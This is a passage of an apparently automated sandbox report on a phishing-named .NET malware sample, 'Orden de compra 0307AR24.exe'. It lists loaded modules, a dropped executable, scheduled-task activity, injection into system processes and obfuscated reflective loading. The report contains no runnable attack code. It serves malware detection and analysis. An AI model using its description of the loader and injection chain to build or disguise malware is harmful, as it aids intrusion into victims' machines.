          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: slc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeAutomated click: OK
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Orden de compra 0307AR24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Orden de compra 0307AR24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: 0.2.Orden de compra 0307AR24.exe.2dcbbd8.0.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.2dcbbd8.0.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.8f00000.5.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.8f00000.5.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.cs .Net Code: HkBkBXA9QR System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.cs .Net Code: HkBkBXA9QR System.Reflection.Assembly.Load(byte[])
          Source: 11.2.RggSaCWUvAyNK.exe.2adbbb0.0.raw.unpack, -Module-.cs .Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 11.2.RggSaCWUvAyNK.exe.2adbbb0.0.raw.unpack, PingPong.cs .Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe Code function: 0_2_058B7169 push 8BBCEB50h; ret 0_2_058B716F
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe Code function: 0_2_058B3B7D push esp; retf 0_2_058B3B84
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00417968 pushfd ; retf 9_2_0041796A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_004191A3 push di; retf 9_2_004191A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00416479 push ebp; ret 9_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041640A push ebp; ret 9_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041D4B5 push eax; ret 9_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041D56C push eax; ret 9_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041D502 push eax; ret 9_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041D50B push eax; ret 9_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00417D1E push esp; ret 9_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00417D3C push esp; ret 9_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_00417655 push esi; iretd 9_2_00417656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0041760D push esi; retf 9_2_0041761D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0183225F pushad ; ret 9_2_018327F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018327FA pushad ; ret 9_2_018327F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_018609AD push ecx; mov dword ptr [esp], ecx 9_2_018609B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_0183283D push eax; iretd 9_2_01832858
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 9_2_01831368 push eax; iretd 9_2_01831369
          Source: C:\Windows\explorer.exe Code function: 10_2_103609B5 push esp; retn 0000h 10_2_10360AE7
          Source: C:\Windows\explorer.exe Code function: 10_2_10360B1E push esp; retn 0000h 10_2_10360B1F
          Source: C:\Windows\explorer.exe Code function: 10_2_10360B02 push esp; retn 0000h 10_2_10360B03
          Source: C:\Windows\explorer.exe Code function: 10_2_10477B02 push esp; retn 0000h 10_2_10477B03
          Source: C:\Windows\explorer.exe Code function: 10_2_10477B1E push esp; retn 0000h 10_2_10477B1F
          Source: C:\Windows\explorer.exe Code function: 10_2_104779B5 push esp; retn 0000h 10_2_10477AE7
          Source: C:\Windows\explorer.exe Code function: 10_2_10AC99B5 push esp; retn 0000h 10_2_10AC9AE7
          Source: C:\Windows\explorer.exe Code function: 10_2_10AC9B02 push esp; retn 0000h 10_2_10AC9B03
          Source: C:\Windows\explorer.exe Code function: 10_2_10AC9B1E push esp; retn 0000h 10_2_10AC9B1F
          Source: C:\Windows\explorer.exe Code function: 10_2_10C139B5 push esp; retn 0000h 10_2_10C13AE7
          Source: C:\Windows\explorer.exe Code function: 10_2_10C13B02 push esp; retn 0000h 10_2_10C13B03
          Source: C:\Windows\explorer.exe Code function: 10_2_10C13B1E push esp; retn 0000h 10_2_10C13B1F
          Source: Orden de compra 0307AR24.exe Static PE information: section name: .text entropy: 7.825436593603401
          Source: RggSaCWUvAyNK.exe.0.dr Static PE information: section name: .text entropy: 7.825436593603401
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, yfmjb7ceHqUt4QUJFL.cs High entropy of concatenated method names: 'SDYIPX87ck', 'BNJIsf39tc', 'XpyIr8quqb', 'iSFI7AnWkO', 'KWjITMCREE', 'zvRItBdrNG', 'hYtI0b4gLC', 'kT5IFk0jwx', 'j3GIXWGea6', 'JrRIfQjelB'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, KR7mpiyPDHBbEyi5xw.cs High entropy of concatenated method names: 'ujQN1yJfYq', 'dWnNZYr3PZ', 'LD5NuPTvky', 'rALNLkJOyN', 'ymJNIUma8R', 'AL3N44TK3L', 'LcFNJXAxWW', 'FI6N6RTpoH', 'CXpNafqSkH', 'JxmNcRYfmi'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.cs High entropy of concatenated method names: 'eSYAWuceOp', 'WiJAQI2aBF', 'K9RAifD83i', 'YH5ANJeqdE', 'LtVAd9lWYU', 'wcFAVCSoEM', 'umjAO4N4LD', 'UclAD8xZOc', 'bR3AYpcmS4', 'e34AGrZWYt'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, TTQDNta7IG5WrwHC6T.cs High entropy of concatenated method names: 's3bhuRXyR0', 'eithL2aBl0', 'QevhHBqaYD', 'VEAhTm4GYx', 'eeBh0l0goF', 'pIshFchIdQ', 'CefhfeH1Kn', 'hfDhwyC7AS', 'f2XhP8KsRJ', 'WIqhqpYfoN'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, p6pIYykcilRMsV2VCx.cs High entropy of concatenated method names: 'Dispose', 'XfXpbRmaRT', 'Aum5TTPJwy', 'tlIMM1jWug', 'd7BpEe3VAW', 'qEApzdp7Lf', 'ProcessDialogKey', 'BgZ5l8CxrG', 'xs05pMipEr', 'loZ55Cl50k'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, rbUGKPdyxBn8XOMxeW.cs High entropy of concatenated method names: 'VgxpOMMvMu', 'rdEpDOVclU', 'JMdpGJencS', 'uHXp20uDol', 'vkUpIMvStN', 'bdAp4ck0se', 'cEVewwmfPwwxTThCZu', 'FwEnrbJdJHLESc6aRs', 'YiP9RC4wVQtAA37gt8', 'aGYppAeOlb'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, BX7Oh87HgOpmOCUgmK.cs High entropy of concatenated method names: 'ugBVWkkpT5', 'H9NViAaiPK', 'NXTVdBEwwu', 'S52VODLvZb', 'JmdVDdsxhV', 'Tb8dKKbFtV', 'lo4dRvVNjp', 'MdWdnZib9o', 'NaudxNYFbc', 'zFudb1iBpx'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, gRDoByRGLPp6pfTSjP.cs High entropy of concatenated method names: 'ToString', 'rvE4qvLY6R', 'khb4TYRw8f', 'H0L4tFaKsH', 'Cu640lWBg1', 'QXt4FTXLbl', 'faq4XOL1T3', 'hnn4f0ylIC', 'xhy4wTiiAu', 'T3W43XyVkB'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, FgUxusEcU0DJni7hio.cs High entropy of concatenated method names: 'nHCapYxVtC', 'mEraA61SYy', 'XWUakQj45J', 'NsWaQRCgDD', 'ClSairB5Dr', 'dgMadBnIxb', 'lCmaVoISjm', 'rOk6nI3oYP', 'y5Z6xVBHMN', 'VDy6bUiUtv'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, MYu7nQer9A19NAow7R.cs High entropy of concatenated method names: 'Ouh6HDTOKF', 'Sxi6TQJAW6', 'T9t6t3pEXO', 'vi960uLyjl', 'col6re3wNn', 'r8y6Fb1n02', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, pqLWAeIFMHg90ZR9dd.cs High entropy of concatenated method names: 'SET6QHE2sp', 'Ukm6ivL5V9', 'Jd96NNTFdB', 'tfh6dnj0m0', 'J7x6VI8Elg', 'TVD6ORYDiJ', 'AZ56De0ZrW', 'XPP6YTVe6g', 'wKG6GUNRtT', 'xuh62DoTBG'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, H6UpB055KFgdieio2Y.cs High entropy of concatenated method names: 'drcB3Gc4N', 'SV31xKnkg', 'XKyZZEGoW', 'wxwUFrNq3', 'EpDLfl0Oy', 'pE5eMtIv1', 'sQNNXVl5cJH0cTlllG', 'G4HsJbqZ7bhNUn5E2q', 'eU56dPrAY', 'Rf1crE3D0'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, ke8rrUqlPToXKD2OoAB.cs High entropy of concatenated method names: 're1ag1DvMl', 'Gnga957x3S', 'PJnaBy5oA7', 'L3pa1By8oC', 'YJjamLcDft', 'M2yaZUGqtL', 'amJaUHNFq1', 'HJBauKGweV', 'e7OaLe7FM2', 'AHAaertwAW'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, lMbMGb1ov4L67EScwT.cs High entropy of concatenated method names: 'qyjdmcq0nx', 'i6kdUKGeVh', 'MTONtnpNVT', 'CNhN0nCfRx', 'jFPNFAsiQp', 'EWJNXoj2Zx', 'JZLNfMxOVT', 'fj3NwtG5a6', 'fDGN35HXol', 'OUBNP6iDvL'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, p3BRIyqACRVJVwwLupF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KndcrtY3eQ', 'jhsc7B8UL4', 'JcIcoZUshU', 'Xh7cyWKkjg', 'J6ccKRjpX5', 'zajcR6UEjA', 'RZBcng6ekg'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, MVHEAJo8kttD6FRHt3.cs High entropy of concatenated method names: 'SO1JxBf6Nc', 'NeHJEHN6IB', 'S7A6lQCogt', 'OGg6phFoGy', 'vVCJqMfBrG', 'yuhJs6X8pD', 'e1jJSOQwxg', 'DcxJrSLwD8', 'TrPJ7a8BvV', 'FDoJof6U6x'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, JvN7hpwJnm4gTu1HXw.cs High entropy of concatenated method names: 'bg2ira8xAf', 'K9ii7C1WDr', 'GwiiobLimw', 'uZGiy4s6SX', 'IKGiKHxTNi', 'bOLiRq8jLr', 'ddKinNpVqw', 'R7pixb6DUs', 'hnwibfXYAV', 'UdQiEYkguV'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, At3TF1qqjpsJPSavYm6.cs High entropy of concatenated method names: 'ToString', 'HI0cApWfGL', 'Ewrcko6NvW', 'GNMcWtoOw6', 'CdncQk0Fdu', 'rcyci85U5o', 'YSmcNQRqS7', 'DgAcd2OJZ9', 'KFs1ZmxmbbKSvWwlW5E', 'Dq7qesxY81p36jLv2Be'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, cZEEvxCghWIf3R5N2R.cs High entropy of concatenated method names: 'KDbOgY8WIB', 'HQNO9vHDMx', 'w8sOBsgEUd', 'mGfO1X1IYu', 'OMqOmuBjNZ', 'CnwOZ9NEsZ', 'YfdOUTO7x3', 'c5ROut5dBa', 'A5uOL3jQ7U', 'gNHOep2Rrr'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, KcAG6fzCKy4Xjm1vtr.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SUnahLSYhe', 'hATaIVV1OL', 'aULa4Jgq5Q', 'MItaJL3xAW', 'OwGa6xSpM1', 'egbaaK8N5G', 'VJCacMjo0o'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, iIt1ZQbm28ELpKbSuJ.cs High entropy of concatenated method names: 'kf6OQPVlPC', 'ECcONJ1HSC', 'fpoOVedEWp', 'V7YVEeGnCZ', 'h0SVzaQSdG', 'iNxOluOAtZ', 'uiPOpp3gF9', 'HaqO5u4jDU', 'ypIOAVM4T0', 'iZkOkJIsWJ'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, yfmjb7ceHqUt4QUJFL.cs High entropy of concatenated method names: 'SDYIPX87ck', 'BNJIsf39tc', 'XpyIr8quqb', 'iSFI7AnWkO', 'KWjITMCREE', 'zvRItBdrNG', 'hYtI0b4gLC', 'kT5IFk0jwx', 'j3GIXWGea6', 'JrRIfQjelB'
